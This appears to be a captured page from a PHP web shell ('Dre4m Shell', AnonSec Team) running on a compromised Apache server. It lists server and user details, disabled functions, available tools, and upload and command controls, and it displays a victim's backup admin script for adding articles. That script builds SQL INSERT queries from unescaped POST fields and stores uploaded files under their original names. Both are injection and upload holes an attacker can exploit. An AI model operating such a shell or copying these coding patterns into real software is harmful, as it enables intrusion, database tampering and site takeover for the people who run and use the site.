Dre4m Shell
Server IP : 127.0.0.2  /  Your IP : 3.143.203.21
Web Server : Apache/2.4.18 (Ubuntu)
System :
User : www-data ( )
PHP Version : 7.0.33-0ubuntu0.16.04.16
Disable Function : disk_free_space,disk_total_space,diskfreespace,dl,exec,fpaththru,getmyuid,getmypid,highlight_file,ignore_user_abord,leak,listen,link,opcache_get_configuration,opcache_get_status,passthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,php_uname,phpinfo,posix_ctermid,posix_getcwd,posix_getegid,posix_geteuid,posix_getgid,posix_getgrgid,posix_getgrnam,posix_getgroups,posix_getlogin,posix_getpgid,posix_getpgrp,posix_getpid,posix,_getppid,posix_getpwnam,posix_getpwuid,posix_getrlimit,posix_getsid,posix_getuid,posix_isatty,posix_kill,posix_mkfifo,posix_setegid,posix_seteuid,posix_setgid,posix_setpgid,posix_setsid,posix_setuid,posix_times,posix_ttyname,posix_uname,pclose,popen,proc_open,proc_close,proc_get_status,proc_nice,proc_terminate,shell_exec,source,show_source,system,virtual
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /var/www/html/admin//article-new-action.php-bkp-feb-28-24
<?php
ob_start();
session_start();
require_once('session-check.php');

require_once('include/db-config.php');
function fetchArticleData($conn)
{
    $sql = "SELECT  ArticleTitle, ArticleType, FileOrUrl, Status, EditedDate, SortOrder FROM maintrainer_articles";
    $result = mysqli_query($conn, $sql);

    $articles = array();

    while ($row = mysqli_fetch_assoc($result)) {
        $editedDate = $row['EditedDate'];
        $editedDateFormatted = date('M-d-y', strtotime($editedDate));
        $row['EditedDate'] = $editedDateFormatted;
        $status = $row['Status'] == 1 ? 'Active' : 'Inactive';
        $row['Status'] = $status;
        $articles[] = $row;
    }
    

    return $articles;
}

function exportXLS($data)
{
    header('Content-Type: application/vnd.ms-excel');
    header('Content-Disposition: attachment; filename="Article_list.xls"');
    $output = fopen('php://output', 'w');
    $headers = array(
'SI',
        'Article Title',
        'Article Type',
        'File or URL',
        'Status',
        'Updated Date',
        'List Order',
    );
    fputcsv($output, $headers);
    
  
    foreach ($data as $index => $row) {
        
        $formattedRow = array(
            $index + 1,
            $row['ArticleTitle'], 
            $row['ArticleType'], 
            $row['FileOrUrl'],
            $row['Status'],
            $row['EditedDate'], 
            $row['SortOrder'] 
        );
        fputcsv($output, $formattedRow);
    }
    fclose($output);
}


$articles = fetchArticleData($conn);

if (isset($_GET['export']) && $_GET['export'] == 'xls') {
    exportXLS($articles);
    exit;
}


function isTitleUnique($conn, $title)
{
    $escapedTitle = mysqli_real_escape_string($conn, $title);
    $query = "SELECT COUNT(*) AS count FROM maintrainer_articles WHERE ArticleTitle = '$escapedTitle'";
    $result = mysqli_query($conn, $query);
    $row = mysqli_fetch_assoc($result);
    return $row['count'] == 0;
}
$title=mysqli_real_escape_string($conn,stripslashes($_POST['title']));
$articletype = $_POST['articletype'];
$searchkey=$_POST['searchkey'];
$summary=mysqli_real_escape_string($conn,$_POST['summary']);
$content = "";
$fileorurl = "";
if (!isTitleUnique($conn, $title)) {
    // Title is not unique, redirect to article-new.php with an error message
    $url = "Location: article-new.php?error=This Article Title already exists.";
    header($url);
    exit;
}
if($articletype == "url")
{
	$fileorurl=$_POST['fileorurl'];	
}
elseif($articletype == "docs")
{
	
	$rootPath = dirname(__DIR__);
	$target_dir = $rootPath . "/public/news_articles/";
	$target_path = $target_dir . basename($_FILES["file1"]['name']);
	// $target_path = "/var/www/html/maintenancetraining/maintenancetraining_laravel/public/news_articles/";
	// $target_path = $target_path . basename($_FILES["file1"]['name']);
	$fileorurl = "news_articles/".$_FILES["file1"]['name'];
	if(move_uploaded_file($_FILES["file1"]['tmp_name'], $target_path))
	{
		$fileorurl = $_FILES["file1"]['name'];
	}

}
elseif($articletype == "html")
{
	$content = mysqli_real_escape_string($conn,stripslashes($_POST['content']));
}

$embed=$_POST['embed'];
$targetpage=$_POST['targetpage'];
$sortorder=$_POST['sortorder'];
$status=$_POST['status'];
$CreatedDate=date("Y-m-d ");
$EditedDate=date("Y-m-d ");
$sql="insert into maintrainer_articles(ArticleTitle, embed_is_checked, ArticleType, FileOrUrl, HTMLContent, TargetPage, SortOrder, Status,SearchKeyword, executive_summary, CreatedDate, EditedDate) values ('".$title."',
'".$embed."','".$articletype."','".$fileorurl."','".$content."', '".$targetpage."',".$sortorder.",".$status.",'".$searchkey."','".$summary."' ,'".$CreatedDate."','".$EditedDate."')";
$result=mysqli_query($conn,$sql);

$articleID = mysqli_insert_id($conn);
if($_POST['catg'] != "")
{
	foreach($_POST['catg'] as $key => $val)
	{
	  $sql1="insert into maintrainer_articles_category_relation(art_cat_id,article_id,created_edited_date) values (".$val.",".$articleID.",'".$CreatedDate."')";
	$result1=mysqli_query($conn,$sql1);
	}
}

if($_POST['catgsite'] != "")
{
	foreach($_POST['catgsite'] as $key => $val)
	{
	  $sql1="insert into maintrainer_articles_site_relation(art_cat_id,article_id,created_edited_date) values (".$val.",".$articleID.",'".$CreatedDate."')";
	  $result1=mysqli_query($conn,$sql1);
	}
}


$url = "Location: article-convert2html.php?r=1&articleid=".$articleID;
//$url = "Location: article-mgt.php?r=1";
header($url);
?>

Anon7 - 2022
AnonSec Team